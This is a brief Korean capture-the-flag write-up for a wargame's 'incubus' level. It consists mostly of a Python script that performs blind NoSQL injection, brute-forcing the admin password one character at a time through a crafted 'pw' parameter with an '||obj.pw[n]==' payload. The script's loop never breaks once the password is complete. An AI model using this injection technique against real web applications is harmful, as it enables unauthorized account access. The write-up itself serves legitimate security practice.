생각보다 단순하다.

https://book.hacktricks.xyz/pentesting-web/nosql-injection 참고해서 쿼리 작성

소스코드

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import math

# Disable flag warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

headers = { 'Cookie': 'PHPSESSID=###'}

base_url = "<https://los.rubiya.kr/chall/incubus_3dff9ce783c9f574edf015a7b99450d7.php>"
            
# pw brute force
password = ''

while True:

    for j in list(range(0,10))+list('abcdefghijklnmopqrstuvwxyz') + list("abcdefghijklnmopqrstuvwxyz".upper()):
        query = f"?id=admin&pw=1'||obj.id=='admin' %26%26 obj.pw[{len(password)}]=='{str(j)}' %26%26 '1'=='1"
        url = base_url + query

        res = requests.get(url=url, headers=headers, verify=False)

        if res.text.find("<br><h2>Hello admin</h2>") != -1:
            password += str(j)
            print("password : ", password)